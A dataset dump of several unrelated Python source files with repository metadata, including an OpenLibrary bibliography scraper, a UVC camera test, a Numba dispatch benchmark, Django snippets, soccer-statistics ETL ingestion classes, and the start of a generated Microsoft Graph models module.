for i in range(0, len(data)-1):
title = data[metr]['title']
metr = metr + 1
books.append(title)
mylist = list(dict.fromkeys(books))
# Filtrering results: trying to erase similar titles
words = [' the ', 'The ', ' THE ', ' The' ' a ', ' A ', ' and ',
' of ', ' from ', 'on', 'The', 'in']
noise_re = re.compile('\\b(%s)\\W'%('|'.join(map(re.escape, words))), re.I)
clean_mylist = [noise_re.sub('', p) for p in mylist]
for i in clean_mylist:
for j in clean_mylist:
a = similar(i, j, similarity)
if a is True:
clean_mylist.pop(a)
clean_mylist.sort()
print(' ~Books found to OpenLibrary Database:\n')
for i in clean_mylist:
print(i)
return clean_mylist
else:
print('(!) No valid author name, or bad internet connection.')
print('Please try again!')
return None
def similar(a, b, similarity):
''' function which check similarity between two strings '''
ratio = SequenceMatcher(None, a, b).ratio()
if ratio > similarity and ratio < 1:
return True
else:
return False
def save_to_txt(lista, path, author):
# save the books list to txt file.
for content in lista:
name = f'{author}_bibliography.txt'
full_path = os.path.join(path, name)
with open(full_path, 'a', encoding='utf-8') as f1:
f1.write(content + ' ' + author + os.linesep)
print('\nList saved at: ', full_path, '\n')
| 34.364865 | 87 | 0.564687 | import requests
import json
import re
from difflib import SequenceMatcher
import os
from bookcut.mirror_checker import pageStatus
OPEN_LIBRARY_URL = 'http://www.openlibrary.org'
def main(author, similarity):
status = pageStatus(OPEN_LIBRARY_URL)
if status is not False:
search_url = "http://openlibrary.org/search.json?author=" + author
jason = requests.get(search_url)
jason = jason.text
data = json.loads(jason)
data = data['docs']
if data != []:
metr = 0
books = []
for i in range(0, len(data)-1):
title = data[metr]['title']
metr = metr + 1
books.append(title)
mylist = list(dict.fromkeys(books))
words = [' the ', 'The ', ' THE ', ' The' ' a ', ' A ', ' and ',
' of ', ' from ', 'on', 'The', 'in']
noise_re = re.compile('\\b(%s)\\W'%('|'.join(map(re.escape, words))), re.I)
clean_mylist = [noise_re.sub('', p) for p in mylist]
for i in clean_mylist:
for j in clean_mylist:
a = similar(i, j, similarity)
if a is True:
clean_mylist.pop(a)
clean_mylist.sort()
print(' ~Books found to OpenLibrary Database:\n')
for i in clean_mylist:
print(i)
return clean_mylist
else:
print('(!) No valid author name, or bad internet connection.')
print('Please try again!')
return None
def similar(a, b, similarity):
ratio = SequenceMatcher(None, a, b).ratio()
if ratio > similarity and ratio < 1:
return True
else:
return False
def save_to_txt(lista, path, author):
for content in lista:
name = f'{author}_bibliography.txt'
full_path = os.path.join(path, name)
with open(full_path, 'a', encoding='utf-8') as f1:
f1.write(content + ' ' + author + os.linesep)
print('\nList saved at: ', full_path, '\n')
| true | true |
1c304704a1d512fe8f0aaa81fbdd60ed45dcc10d | 189 | py | Python | main.py | nhnam0209/Automatic-Render-PDF-CV | a2d971a62adfd2cbd8ffbc02c0c7c37c8d9a9908 | [
"CC0-1.0"
] | 1 | 2022-01-15T06:02:08.000Z | 2022-01-15T06:02:08.000Z | main.py | nhnam0209/Automatic-Render-PDF-CV | a2d971a62adfd2cbd8ffbc02c0c7c37c8d9a9908 | [
"CC0-1.0"
] | null | null | null | main.py | nhnam0209/Automatic-Render-PDF-CV | a2d971a62adfd2cbd8ffbc02c0c7c37c8d9a9908 | [
"CC0-1.0"
] | null | null | null | import json
from a_40.a_40 import fill
import time
if __name__ == '__main__':
s = time.time()
with open("cv.json", encoding="utf8") as f:
data = json.load(f)
fill(data)
| 21 | 47 | 0.62963 | import json
from a_40.a_40 import fill
import time
if __name__ == '__main__':
s = time.time()
with open("cv.json", encoding="utf8") as f:
data = json.load(f)
fill(data)
| true | true |
1c3047312aa578da327c332ab9e4e7611547e93b | 1,561 | py | Python | uvclite/test.py | worldcom-exchange/uvclite | 5fac35153faa42c712ab0f8488f6b343d3c3469e | [
"Apache-2.0"
] | 5 | 2018-04-11T08:32:55.000Z | 2021-11-26T13:56:39.000Z | uvclite/test.py | worldcom-exchange/uvclite | 5fac35153faa42c712ab0f8488f6b343d3c3469e | [
"Apache-2.0"
] | null | null | null | uvclite/test.py | worldcom-exchange/uvclite | 5fac35153faa42c712ab0f8488f6b343d3c3469e | [
"Apache-2.0"
] | 5 | 2018-11-13T18:17:18.000Z | 2021-11-26T13:56:41.000Z | #!/usr/bin/python
# Copyright 2017 Eric Callahan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import uvclite
if __name__ == '__main__':
with uvclite.UVCContext() as context:
devlist = context.get_device_list()
#dev = context.find_device()
print(len(devlist))
for dev in devlist:
devdesc = dev.get_device_descriptor()
print("Vendor ID: %d" % devdesc.idVendor)
print("Product ID: %d" % devdesc.idProduct)
print("UVC Standard: %d" % devdesc.bcdUVC)
print("Serial Number: %s" % devdesc.serialNumber)
print("Manufacturer: %s" % devdesc.manufacturer)
print("Product Name %s" % devdesc.product)
dev.free_device_descriptor()
print("Freed descriptor")
devlist = context.get_device_list()
#dev = context.find_device()
print(len(devlist))
for dev in devlist:
dev.open()
dev.print_diagnostics()
dev.close()
| 33.934783 | 74 | 0.649584 |
from __future__ import print_function
import uvclite
if __name__ == '__main__':
with uvclite.UVCContext() as context:
devlist = context.get_device_list()
print(len(devlist))
for dev in devlist:
devdesc = dev.get_device_descriptor()
print("Vendor ID: %d" % devdesc.idVendor)
print("Product ID: %d" % devdesc.idProduct)
print("UVC Standard: %d" % devdesc.bcdUVC)
print("Serial Number: %s" % devdesc.serialNumber)
print("Manufacturer: %s" % devdesc.manufacturer)
print("Product Name %s" % devdesc.product)
dev.free_device_descriptor()
print("Freed descriptor")
devlist = context.get_device_list()
print(len(devlist))
for dev in devlist:
dev.open()
dev.print_diagnostics()
dev.close()
| true | true |
1c304913101c17c5d6a2c699cd1001acac57a3be | 2,195 | py | Python | benchmarks/bench_dispatch.py | abitrolly/numba-benchmark | 4bea9c23276fd0399df26452d19f13810a6496c7 | [
"BSD-2-Clause"
] | 6 | 2015-10-19T09:18:50.000Z | 2021-11-29T10:37:10.000Z | benchmarks/bench_dispatch.py | abitrolly/numba-benchmark | 4bea9c23276fd0399df26452d19f13810a6496c7 | [
"BSD-2-Clause"
] | 9 | 2015-03-03T09:50:56.000Z | 2021-10-13T08:34:06.000Z | benchmarks/bench_dispatch.py | abitrolly/numba-benchmark | 4bea9c23276fd0399df26452d19f13810a6496c7 | [
"BSD-2-Clause"
] | 7 | 2015-09-09T17:38:11.000Z | 2021-09-24T15:06:19.000Z | """
Benchmarks for argument dispatching and call overhead of ``@jit`` functions.
"""
import numpy as np
rec_dtype = np.dtype([('a', np.float64),
('b', np.int32),
('c', np.complex64),
])
samples = {
'bool': True,
'int': 100000,
'float': 0.5,
'complex': 0.5 + 1.0j,
'array_1d': np.zeros(10, dtype=np.int64),
'array_3d': np.zeros(20, dtype=np.float64).reshape(2, 2, 5),
'array_records': np.zeros(10, dtype=rec_dtype),
'recarray': np.recarray(10, dtype=rec_dtype),
'tuple': (0.5, 1.0j, ()),
'record': np.empty(1, dtype=rec_dtype)[0],
'bytearray': bytearray(3),
}
def setup():
"""
Precompile jitted functions. This will register many specializations
to choose from.
"""
from numba import jit
global binary, binary_pyobj, unary_default
@jit(nopython=True)
def binary(x, y):
pass
@jit(forceobj=True)
def binary_pyobj(x, y):
pass
@jit(nopython=True)
def unary_default(x=None):
pass
for tp in samples.values():
binary(tp, tp)
binary_pyobj(object(), object())
unary_default()
class NoPythonDispatch:
"""
Time dispatching to a jitted function's specializations based on argument
types.
This stresses two things:
- the typing of arguments (from argument value to typecode)
- the selection of the best specialization amongst all the known ones
"""
# We repeat 1000 times so as to make the overhead of benchmark launching
# negligible.
@classmethod
def generate_benchmarks(cls, names):
for name in names:
def timefunc(self, arg=samples[name]):
func = binary
for i in range(1000):
func(arg, arg)
timefunc.__name__ = "time_dispatch_" + name
setattr(cls, timefunc.__name__, timefunc)
def time_dispatch_defaults(self):
unary_default()
NoPythonDispatch.generate_benchmarks(samples.keys())
class PyObjectDispatch:
def time_dispatch_pyobject(self):
x = object()
for i in range(1000):
binary_pyobj(x, x)
| 24.120879 | 77 | 0.598633 |
import numpy as np
rec_dtype = np.dtype([('a', np.float64),
('b', np.int32),
('c', np.complex64),
])
samples = {
'bool': True,
'int': 100000,
'float': 0.5,
'complex': 0.5 + 1.0j,
'array_1d': np.zeros(10, dtype=np.int64),
'array_3d': np.zeros(20, dtype=np.float64).reshape(2, 2, 5),
'array_records': np.zeros(10, dtype=rec_dtype),
'recarray': np.recarray(10, dtype=rec_dtype),
'tuple': (0.5, 1.0j, ()),
'record': np.empty(1, dtype=rec_dtype)[0],
'bytearray': bytearray(3),
}
def setup():
from numba import jit
global binary, binary_pyobj, unary_default
@jit(nopython=True)
def binary(x, y):
pass
@jit(forceobj=True)
def binary_pyobj(x, y):
pass
@jit(nopython=True)
def unary_default(x=None):
pass
for tp in samples.values():
binary(tp, tp)
binary_pyobj(object(), object())
unary_default()
class NoPythonDispatch:
@classmethod
def generate_benchmarks(cls, names):
for name in names:
def timefunc(self, arg=samples[name]):
func = binary
for i in range(1000):
func(arg, arg)
timefunc.__name__ = "time_dispatch_" + name
setattr(cls, timefunc.__name__, timefunc)
def time_dispatch_defaults(self):
unary_default()
NoPythonDispatch.generate_benchmarks(samples.keys())
class PyObjectDispatch:
def time_dispatch_pyobject(self):
x = object()
for i in range(1000):
binary_pyobj(x, x)
| true | true |
1c304943b771fde4e13df8b6570f2d00195a8af1 | 425 | py | Python | chat/management/commands/init_db.py | moustaphacheikh/pychat | 05a8b255efda03840a9ce8d39a9ee1d38b87ea67 | [
"MIT"
] | null | null | null | chat/management/commands/init_db.py | moustaphacheikh/pychat | 05a8b255efda03840a9ce8d39a9ee1d38b87ea67 | [
"MIT"
] | null | null | null | chat/management/commands/init_db.py | moustaphacheikh/pychat | 05a8b255efda03840a9ce8d39a9ee1d38b87ea67 | [
"MIT"
] | null | null | null | __author__ = 'andrew'
from django.core.management import call_command, BaseCommand
class Command(BaseCommand):
help = 'Creates the database'
def handle(self, *args, **options):
#Django 1.6 South
#python manage.py schemamigration chat $1 --initial
#python manage.py syncdb --all
#python manage.py migrate --fake
call_command('makemigrations', 'chat')
call_command('migrate', 'auth')
# call_command('syncdb') | 28.333333 | 60 | 0.731765 | __author__ = 'andrew'
from django.core.management import call_command, BaseCommand
class Command(BaseCommand):
help = 'Creates the database'
def handle(self, *args, **options):
call_command('makemigrations', 'chat')
call_command('migrate', 'auth')
| true | true |
1c304975a7a8fa4927bdb739b63ca2b5b5170682 | 12,149 | py | Python | marcottimls/etl/statistics.py | soccermetrics/marcotti-mls | 84c6d0d619c1a0c70dc6602074a3c5227959803c | [
"MIT"
] | 3 | 2016-08-04T10:34:01.000Z | 2019-03-05T23:22:06.000Z | marcottimls/etl/statistics.py | soccermetrics/marcotti-mls | 84c6d0d619c1a0c70dc6602074a3c5227959803c | [
"MIT"
] | null | null | null | marcottimls/etl/statistics.py | soccermetrics/marcotti-mls | 84c6d0d619c1a0c70dc6602074a3c5227959803c | [
"MIT"
] | null | null | null | import logging
from marcottimls.etl.base import SeasonalDataIngest
from marcottimls.models import *
logger = logging.getLogger(__name__)
class PlayerMinuteIngest(SeasonalDataIngest):
"""
Ingestion methods for data files containing player minutes.
"""
BATCH_SIZE = 50
def parse_file(self, rows):
inserts = 0
insertion_list = []
logger.info("Ingesting Player Minutes...")
for keys in rows:
competition_name = self.column_unicode("Competition", **keys)
season_name = self.column("Season", **keys)
club_symbol = self.column("Club Symbol", **keys)
last_name = self.column_unicode("Last Name", **keys)
first_name = self.column_unicode("First Name", **keys)
total_minutes = self.column_int("Mins", **keys)
competition_id = self.get_id(Competitions, name=competition_name)
if competition_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Competition {} not in database".format(first_name, last_name, competition_name))
continue
season_id = self.get_id(Seasons, name=season_name)
if season_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Season {} not in database".format(first_name, last_name, season_name))
continue
club_id = self.get_id(Clubs, symbol=club_symbol)
if club_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Club {} not in database".format(first_name, last_name, club_symbol))
continue
player_id = self.get_player_from_name(first_name, last_name)
if player_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Player not in database".format(first_name, last_name))
continue
stat_dict = self.prepare_db_dict(
['player_id', 'club_id', 'competition_id', 'season_id', 'minutes'],
[player_id, club_id, competition_id, season_id, total_minutes])
if not self.record_exists(FieldPlayerStats, **stat_dict):
insertion_list.append(FieldPlayerStats(**stat_dict))
inserted, insertion_list = self.bulk_insert(insertion_list, PlayerMinuteIngest.BATCH_SIZE)
inserts += inserted
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} Player Minutes records inserted and committed to database".format(inserts))
logger.info("Player Minutes Ingestion complete.")
class MatchStatIngest(SeasonalDataIngest):
"""
Ingestion methods for data files containing season statistics.
Assume categories and nomenclature of Nielsen soccer database.
"""
@staticmethod
def is_empty_record(*args):
"""Check for sparseness of statistical record.
If all quantities of a statistical record are empty, return True.
If at least one quantity of statistical record is not empty, return False.
:param args: list of elements
:return: boolean that expresses (non-)sparseness of list
"""
return not any(arg for arg in args)
@staticmethod
def empty_ids(*args):
"""
Check for undefined database IDs in a list.
If any of the IDs are undefined (None), return True.
If all of the IDs are defined (not None), return False.
:param args: list of elements
:return: boolean that expresses presence of undefined elements
"""
return any(arg is None for arg in args)
def get_common_stats(self, **keys):
last_name = self.column_unicode("Last Name", **keys)
first_name = self.column_unicode("First Name", **keys)
club_name = self.column_unicode("Club", **keys)
competition_name = self.column_unicode("Competition", **keys)
start_year = self.column_int("Year1", **keys)
end_year = self.column_int("Year2", **keys)
match_appearances = self.column_int("Gp", **keys)
matches_subbed = self.column_int("Sb", **keys)
total_minutes = self.column_int("Min", **keys)
yellow_cards = self.column_int("Yc", **keys)
red_cards = self.column_int("Rc", **keys)
player_id = self.get_player_from_name(first_name, last_name)
club_id = self.get_id(Clubs, name=club_name)
competition_id = self.get_id(Competitions, name=competition_name)
season_name = "{}".format(start_year) if start_year == end_year else "{}-{}".format(start_year, end_year)
season_id = self.get_id(Seasons, name=season_name)
if self.empty_ids(player_id, club_id, competition_id, season_id):
raise ValueError("At least one of Player/Club/Competition/Season IDs is empty. Skipping insert")
stat_dict = self.prepare_db_dict(
['player_id', 'club_id', 'competition_id', 'season_id', 'appearances',
'substituted', 'minutes', 'yellows', 'reds'],
[player_id, club_id, competition_id, season_id, match_appearances,
matches_subbed, total_minutes, yellow_cards, red_cards])
return stat_dict
def parse_file(self, rows):
raise NotImplementedError
class FieldStatIngest(MatchStatIngest):
BATCH_SIZE = 500
def parse_file(self, rows):
inserts = 0
insertion_list = []
for keys in rows:
try:
common_stat_dict = self.get_common_stats(**keys)
except ValueError as err:
logger.error(err.message)
continue
total_goals = self.column_int("Gl", **keys)
headed_goals = self.column_int("Hd", **keys)
freekick_goals = self.column_int("Fk", **keys)
in_box_goals = self.column_int("In", **keys)
out_box_goals = self.column_int("Out", **keys)
game_winning_goals = self.column_int("Gw", **keys)
penalty_goals = self.column_int("Pn", **keys)
total_penalties = self.column_int("Pa", **keys)
assists = self.column_int("As", **keys)
deadball_assists = self.column_int("Dd", **keys)
shots = self.column_int("Sht", **keys)
fouls = self.column_int("Fls", **keys)
field_stat_dict = self.prepare_db_dict(
['goals_total', 'goals_headed', 'goals_freekick', 'goals_in_area', 'goals_out_area',
'goals_winners', 'goals_penalty', 'penalties_taken', 'assists_total', 'assists_deadball',
'shots_total', 'fouls_total'],
[total_goals, headed_goals, freekick_goals, in_box_goals, out_box_goals,
game_winning_goals, penalty_goals, total_penalties, assists, deadball_assists,
shots, fouls]
)
field_stat_dict.update(common_stat_dict)
if field_stat_dict is not None:
if not self.record_exists(FieldPlayerStats, **field_stat_dict):
insertion_list.append(FieldPlayerStats(**field_stat_dict))
inserted, insertion_list = self.bulk_insert(insertion_list, FieldStatIngest.BATCH_SIZE)
inserts += inserted
if inserted and not inserts % FieldStatIngest.BATCH_SIZE:
logger.info("{} records inserted".format(inserts))
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} Field Player Statistics records inserted and committed to database".format(inserts))
logger.info("Field Player Statistics Ingestion complete.")
class GoalkeeperStatIngest(MatchStatIngest):
BATCH_SIZE = 50
def parse_file(self, rows):
inserts = 0
insertion_list = []
for keys in rows:
try:
common_stat_dict = self.get_common_stats(**keys)
except ValueError as err:
logger.error(err.message)
continue
wins = self.column_int("Wn", **keys)
draws = self.column_int("Dr", **keys)
losses = self.column_int("Ls", **keys)
goals_allowed = self.column_int("Ga", **keys)
clean_sheets = self.column_int("Cs", **keys)
shots_allowed = self.column_int("Sht", **keys)
gk_stat_dict = self.prepare_db_dict(
['wins', 'draws', 'losses', 'goals_allowed', 'shots_allowed', 'clean_sheets'],
[wins, draws, losses, goals_allowed, shots_allowed, clean_sheets]
)
gk_stat_dict.update(common_stat_dict)
if gk_stat_dict is not None:
if not self.record_exists(GoalkeeperStats, **gk_stat_dict):
stat_record = GoalkeeperStats(**gk_stat_dict)
insertion_list.append(stat_record)
inserted, insertion_list = self.bulk_insert(insertion_list, GoalkeeperStatIngest.BATCH_SIZE)
inserts += inserted
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} Goalkeeper Statistics records inserted and committed to database".format(inserts))
logger.info("Goalkeeper Statistics Ingestion complete.")
class LeaguePointIngest(SeasonalDataIngest):
BATCH_SIZE = 10
def parse_file(self, rows):
inserts = 0
insertion_list = []
for keys in rows:
try:
club_symbol = self.column("Club Symbol", **keys)
except KeyError:
club_symbol = None
try:
club_name = self.column_unicode("Club", **keys)
except KeyError:
club_name = None
competition_name = self.column_unicode("Competition", **keys)
season_name = self.column("Season", **keys)
matches_played = self.column_int("GP", **keys)
points = self.column_int("Pts", **keys)
competition_id = self.get_id(Competitions, name=competition_name)
if competition_id is None:
logger.error(u"Cannot insert LeaguePoint record: "
u"Competition {} not in database".format(competition_name))
continue
season_id = self.get_id(Seasons, name=season_name)
if season_id is None:
logger.error(u"Cannot insert LeaguePoint record: "
u"Season {} not in database".format(season_name))
continue
club_dict = {field: value for (field, value)
in zip(['name', 'symbol'], [club_name, club_symbol])
if value is not None}
club_id = self.get_id(Clubs, **club_dict)
if club_id is None:
logger.error(u"Cannot insert LeaguePoint record: "
u"Database error involving {}".format(club_dict))
continue
club_season_dict = dict(club_id=club_id, competition_id=competition_id, season_id=season_id)
if not self.record_exists(LeaguePoints, **club_season_dict):
point_record_dict = dict(played=matches_played, points=points)
point_record_dict.update(club_season_dict)
insertion_list.append(LeaguePoints(**point_record_dict))
inserted, insertion_list = self.bulk_insert(insertion_list, LeaguePointIngest.BATCH_SIZE)
inserts += inserted
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} League Point records inserted and committed to database".format(inserts))
logger.info("League Point Ingestion complete.")
| 44.339416 | 114 | 0.610009 | import logging
from marcottimls.etl.base import SeasonalDataIngest
from marcottimls.models import *
logger = logging.getLogger(__name__)
class PlayerMinuteIngest(SeasonalDataIngest):
BATCH_SIZE = 50
def parse_file(self, rows):
inserts = 0
insertion_list = []
logger.info("Ingesting Player Minutes...")
for keys in rows:
competition_name = self.column_unicode("Competition", **keys)
season_name = self.column("Season", **keys)
club_symbol = self.column("Club Symbol", **keys)
last_name = self.column_unicode("Last Name", **keys)
first_name = self.column_unicode("First Name", **keys)
total_minutes = self.column_int("Mins", **keys)
competition_id = self.get_id(Competitions, name=competition_name)
if competition_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Competition {} not in database".format(first_name, last_name, competition_name))
continue
season_id = self.get_id(Seasons, name=season_name)
if season_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Season {} not in database".format(first_name, last_name, season_name))
continue
club_id = self.get_id(Clubs, symbol=club_symbol)
if club_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Club {} not in database".format(first_name, last_name, club_symbol))
continue
player_id = self.get_player_from_name(first_name, last_name)
if player_id is None:
logger.error(u"Cannot insert Player Minutes record for {} {}: "
u"Player not in database".format(first_name, last_name))
continue
stat_dict = self.prepare_db_dict(
['player_id', 'club_id', 'competition_id', 'season_id', 'minutes'],
[player_id, club_id, competition_id, season_id, total_minutes])
if not self.record_exists(FieldPlayerStats, **stat_dict):
insertion_list.append(FieldPlayerStats(**stat_dict))
inserted, insertion_list = self.bulk_insert(insertion_list, PlayerMinuteIngest.BATCH_SIZE)
inserts += inserted
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} Player Minutes records inserted and committed to database".format(inserts))
logger.info("Player Minutes Ingestion complete.")
class MatchStatIngest(SeasonalDataIngest):
@staticmethod
def is_empty_record(*args):
return not any(arg for arg in args)
@staticmethod
def empty_ids(*args):
return any(arg is None for arg in args)
def get_common_stats(self, **keys):
last_name = self.column_unicode("Last Name", **keys)
first_name = self.column_unicode("First Name", **keys)
club_name = self.column_unicode("Club", **keys)
competition_name = self.column_unicode("Competition", **keys)
start_year = self.column_int("Year1", **keys)
end_year = self.column_int("Year2", **keys)
match_appearances = self.column_int("Gp", **keys)
matches_subbed = self.column_int("Sb", **keys)
total_minutes = self.column_int("Min", **keys)
yellow_cards = self.column_int("Yc", **keys)
red_cards = self.column_int("Rc", **keys)
player_id = self.get_player_from_name(first_name, last_name)
club_id = self.get_id(Clubs, name=club_name)
competition_id = self.get_id(Competitions, name=competition_name)
season_name = "{}".format(start_year) if start_year == end_year else "{}-{}".format(start_year, end_year)
season_id = self.get_id(Seasons, name=season_name)
if self.empty_ids(player_id, club_id, competition_id, season_id):
raise ValueError("At least one of Player/Club/Competition/Season IDs is empty. Skipping insert")
stat_dict = self.prepare_db_dict(
['player_id', 'club_id', 'competition_id', 'season_id', 'appearances',
'substituted', 'minutes', 'yellows', 'reds'],
[player_id, club_id, competition_id, season_id, match_appearances,
matches_subbed, total_minutes, yellow_cards, red_cards])
return stat_dict
def parse_file(self, rows):
raise NotImplementedError
class FieldStatIngest(MatchStatIngest):
BATCH_SIZE = 500
def parse_file(self, rows):
inserts = 0
insertion_list = []
for keys in rows:
try:
common_stat_dict = self.get_common_stats(**keys)
except ValueError as err:
logger.error(err.message)
continue
total_goals = self.column_int("Gl", **keys)
headed_goals = self.column_int("Hd", **keys)
freekick_goals = self.column_int("Fk", **keys)
in_box_goals = self.column_int("In", **keys)
out_box_goals = self.column_int("Out", **keys)
game_winning_goals = self.column_int("Gw", **keys)
penalty_goals = self.column_int("Pn", **keys)
total_penalties = self.column_int("Pa", **keys)
assists = self.column_int("As", **keys)
deadball_assists = self.column_int("Dd", **keys)
shots = self.column_int("Sht", **keys)
fouls = self.column_int("Fls", **keys)
field_stat_dict = self.prepare_db_dict(
['goals_total', 'goals_headed', 'goals_freekick', 'goals_in_area', 'goals_out_area',
'goals_winners', 'goals_penalty', 'penalties_taken', 'assists_total', 'assists_deadball',
'shots_total', 'fouls_total'],
[total_goals, headed_goals, freekick_goals, in_box_goals, out_box_goals,
game_winning_goals, penalty_goals, total_penalties, assists, deadball_assists,
shots, fouls]
)
field_stat_dict.update(common_stat_dict)
if field_stat_dict is not None:
if not self.record_exists(FieldPlayerStats, **field_stat_dict):
insertion_list.append(FieldPlayerStats(**field_stat_dict))
inserted, insertion_list = self.bulk_insert(insertion_list, FieldStatIngest.BATCH_SIZE)
inserts += inserted
if inserted and not inserts % FieldStatIngest.BATCH_SIZE:
logger.info("{} records inserted".format(inserts))
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} Field Player Statistics records inserted and committed to database".format(inserts))
logger.info("Field Player Statistics Ingestion complete.")
class GoalkeeperStatIngest(MatchStatIngest):
BATCH_SIZE = 50
def parse_file(self, rows):
inserts = 0
insertion_list = []
for keys in rows:
try:
common_stat_dict = self.get_common_stats(**keys)
except ValueError as err:
logger.error(err.message)
continue
wins = self.column_int("Wn", **keys)
draws = self.column_int("Dr", **keys)
losses = self.column_int("Ls", **keys)
goals_allowed = self.column_int("Ga", **keys)
clean_sheets = self.column_int("Cs", **keys)
shots_allowed = self.column_int("Sht", **keys)
gk_stat_dict = self.prepare_db_dict(
['wins', 'draws', 'losses', 'goals_allowed', 'shots_allowed', 'clean_sheets'],
[wins, draws, losses, goals_allowed, shots_allowed, clean_sheets]
)
gk_stat_dict.update(common_stat_dict)
if gk_stat_dict is not None:
if not self.record_exists(GoalkeeperStats, **gk_stat_dict):
stat_record = GoalkeeperStats(**gk_stat_dict)
insertion_list.append(stat_record)
inserted, insertion_list = self.bulk_insert(insertion_list, GoalkeeperStatIngest.BATCH_SIZE)
inserts += inserted
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} Goalkeeper Statistics records inserted and committed to database".format(inserts))
logger.info("Goalkeeper Statistics Ingestion complete.")
class LeaguePointIngest(SeasonalDataIngest):
BATCH_SIZE = 10
def parse_file(self, rows):
inserts = 0
insertion_list = []
for keys in rows:
try:
club_symbol = self.column("Club Symbol", **keys)
except KeyError:
club_symbol = None
try:
club_name = self.column_unicode("Club", **keys)
except KeyError:
club_name = None
competition_name = self.column_unicode("Competition", **keys)
season_name = self.column("Season", **keys)
matches_played = self.column_int("GP", **keys)
points = self.column_int("Pts", **keys)
competition_id = self.get_id(Competitions, name=competition_name)
if competition_id is None:
logger.error(u"Cannot insert LeaguePoint record: "
u"Competition {} not in database".format(competition_name))
continue
season_id = self.get_id(Seasons, name=season_name)
if season_id is None:
logger.error(u"Cannot insert LeaguePoint record: "
u"Season {} not in database".format(season_name))
continue
club_dict = {field: value for (field, value)
in zip(['name', 'symbol'], [club_name, club_symbol])
if value is not None}
club_id = self.get_id(Clubs, **club_dict)
if club_id is None:
logger.error(u"Cannot insert LeaguePoint record: "
u"Database error involving {}".format(club_dict))
continue
club_season_dict = dict(club_id=club_id, competition_id=competition_id, season_id=season_id)
if not self.record_exists(LeaguePoints, **club_season_dict):
point_record_dict = dict(played=matches_played, points=points)
point_record_dict.update(club_season_dict)
insertion_list.append(LeaguePoints(**point_record_dict))
inserted, insertion_list = self.bulk_insert(insertion_list, LeaguePointIngest.BATCH_SIZE)
inserts += inserted
self.session.add_all(insertion_list)
self.session.commit()
inserts += len(insertion_list)
logger.info("Total {} League Point records inserted and committed to database".format(inserts))
logger.info("League Point Ingestion complete.")
| true | true |
1c3049775724c20b93d2f960b2c315767c18f81b | 107 | py | Python | ChillProger/views.py | PhillKroger/ChillProger | 238348e83f199c6591a75cefec9591d977712a14 | [
"MIT"
] | null | null | null | ChillProger/views.py | PhillKroger/ChillProger | 238348e83f199c6591a75cefec9591d977712a14 | [
"MIT"
] | null | null | null | ChillProger/views.py | PhillKroger/ChillProger | 238348e83f199c6591a75cefec9591d977712a14 | [
"MIT"
] | null | null | null | from django.shortcuts import render
def home_view(request):
return render(request, 'main/main.html') | 17.833333 | 44 | 0.757009 | from django.shortcuts import render
def home_view(request):
return render(request, 'main/main.html') | true | true |
1c304a7ff78d7adceaada5123ee020405468e918 | 39,477 | py | Python | msgraph-cli-extensions/beta/calendar_beta/azext_calendar_beta/vendored_sdks/calendar/models/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/beta/calendar_beta/azext_calendar_beta/vendored_sdks/calendar/models/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/beta/calendar_beta/azext_calendar_beta/vendored_sdks/calendar/models/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import CollectionOfAttachment
from ._models_py3 import CollectionOfAttachment0
from ._models_py3 import CollectionOfAttachment1
from ._models_py3 import CollectionOfAttachment10
from ._models_py3 import CollectionOfAttachment2
from ._models_py3 import CollectionOfAttachment3
from ._models_py3 import CollectionOfAttachment4
from ._models_py3 import CollectionOfAttachment5
from ._models_py3 import CollectionOfAttachment6
from ._models_py3 import CollectionOfAttachment7
from ._models_py3 import CollectionOfAttachment8
from ._models_py3 import CollectionOfAttachment9
from ._models_py3 import CollectionOfCalendar
from ._models_py3 import CollectionOfCalendar0
from ._models_py3 import CollectionOfCalendarGroup
from ._models_py3 import CollectionOfCalendarPermission
from ._models_py3 import CollectionOfCalendarPermission0
from ._models_py3 import CollectionOfCalendarPermission1
from ._models_py3 import CollectionOfCalendarPermission2
from ._models_py3 import CollectionOfCalendarPermission3
from ._models_py3 import CollectionOfCalendarPermission4
from ._models_py3 import CollectionOfCalendarPermission5
from ._models_py3 import CollectionOfCalendarPermission6
from ._models_py3 import CollectionOfEvent
from ._models_py3 import CollectionOfEvent0
from ._models_py3 import CollectionOfEvent1
from ._models_py3 import CollectionOfEvent10
from ._models_py3 import CollectionOfEvent11
from ._models_py3 import CollectionOfEvent12
from ._models_py3 import CollectionOfEvent13
from ._models_py3 import CollectionOfEvent14
